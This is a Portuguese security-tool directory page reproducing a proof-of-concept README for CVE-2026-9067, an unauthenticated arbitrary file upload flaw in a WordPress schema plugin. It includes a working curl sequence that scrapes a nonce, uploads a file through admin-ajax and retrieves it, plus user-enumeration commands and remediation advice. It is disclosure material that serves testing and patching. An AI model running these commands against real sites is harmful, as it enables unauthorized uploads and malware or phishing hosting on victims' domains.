Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
By-Poloss..-..CVE-2026-9067 — Schema & Structured Data for WP & AMP < 1.60 - Upload Arbitrário de Mídia Não Autenticado [POC & Xploit] | Kitploit
Ferramentas/GitHubGitHub/polosss/by-poloss..-..cve-2026-9067
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubpolosss/by-poloss..-..cve-2026-9067

By-Poloss..-..CVE-2026-9067

Schema & Structured Data for WP & AMP < 1.60 - Upload Arbitrário de Mídia Não Autenticado [POC & Xploit]

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
3há 2 mesesAinda não revisado

POC & Xploit - Diretório de Prova de Conceito

Documentação e exploits para vulnerabilidades encontradas no ambiente de testes de segurança do WordPress.


Lista de Vulnerabilidades

CVE IDPluginGravidadeTipoStatus
CVE-2026-9067Schema & Structured Data for WP & AMPAlta (8.1)Upload de Arquivo sem RestriçõesDocumentado

CVE-2026-9067

Resumo Rápido

Descrição da Vulnerabilidade

O plugin Schema & Structured Data for WP & AMP antes da versão 1.60 não valida a capability do usuário nos handlers de AJAX para upload de arquivos e não valida o tipo de arquivo enviado. Isso permite que um atacante não autenticado faça upload de arquivos arbitrários.

Impacto

  • Hospedagem de Conteúdo: o atacante pode hospedar conteúdo malicioso no domínio da vítima
  • Consumo de Disco: o upload de arquivos arbitrários pode esgotar o espaço em disco
  • Abuso de Reputação: distribuição de malware e páginas de phishing a partir do domínio da vítima

Nota Importante: o núcleo do WordPress bloqueia arquivos executáveis (.php, .phtml, .html, .svg), portanto não há caminho direto de RCE a partir dessa vulnerabilidade.

Arquivos

root@kitploit:~
CVE-2026-9067/
├── CVE-2026-9067.md       # Dokumentasi lengkap (file ini)
├── CVE-2026-9067.py       # Python exploit dengan multi-threading
├── CVE-2026-9067.sh       # Bash/Shell PoC script
└── CVE-2026-9067_exploit.sh  # Alternative Bash PoC

PoC Rápido

root@kitploit:~
# Step 1: Get nonce
NONCE=$(curl -s "https://yorbit7.ddev.site/" | grep -oP 'saswp_rf_(page_)?security_nonce["\x27]?\s*:\s*["\'](https://github.com/polosss/by-poloss..-..cve-2026-9067/blob/HEAD/%5Ba-f0-9%5D%7B10%7D)["\']' | grep -oP '[a-f0-9]{10}' | head -1)

# Step 2: Upload arbitrary file
curl -X POST 'https://yorbit7.ddev.site/wp-admin/admin-ajax.php' \
  -F 'action=saswp_rf_form_image_upload' \
  -F "saswp_rf_form_nonce=$NONCE" \
  -F '[email protected];type=image/png;filename=evil.csv'

# Step 3: Access uploaded file
curl -s "https://yorbit7.ddev.site/wp-content/uploads/$(date +%Y)/$(date +%m)/evil.csv"

Informações do Ambiente


Comandos de Teste

Verificar o Status do Site

root@kitploit:~
curl -s -o /dev/null -w "%{http_code}" https://yorbit7.ddev.site

Verificar a Versão do Plugin

root@kitploit:~
curl -s https://yorbit7.ddev.site/wp-content/plugins/schema-and-structured-data-for-wp/readme.txt | grep -i "Stable tag:"

Enumerar Usuários

root@kitploit:~
curl -s https://yorbit7.ddev.site/wp-json/wp/v2/users | jq '.[] | {id, name, slug}'

Remediação

  1. Atualizar o Plugin: atualize o Schema & Structured Data for WP & AMP para a versão 1.60 ou mais recente
  2. Desativar o Plugin: se a atualização não for possível, desative o plugin
  3. Hardening:
    • Defina a constante DISALLOW_FILE_MODIFICATIONS
    • Desative a execução de PHP no diretório de uploads via .htaccess
    • Implemente regras de WAF

Referências

  • NVD CVE-2026-9067
  • Banco de Dados de Vulnerabilidades do WPScan
  • Página do Plugin no WordPress
  • Pesquisador Original: 0xBassia
Baixar ferramenta
CampoValor
CVE IDCVE-2026-9067
PluginSchema & Structured Data for WP & AMP
Versões Afetadas< 1.60
CWECWE-434 (Upload sem restrições de arquivo com tipo perigoso)
CVSS v3.18.1 (Alta)
Pesquisador0xBassia
CampoValor
URL Alvohttps://yorbit7.ddev.site
Versão do PHP8.4
Banco de DadosMariaDB 11.8
Versão do WordPress7.0
Método de Testebaseado em curl (teste de caixa preta)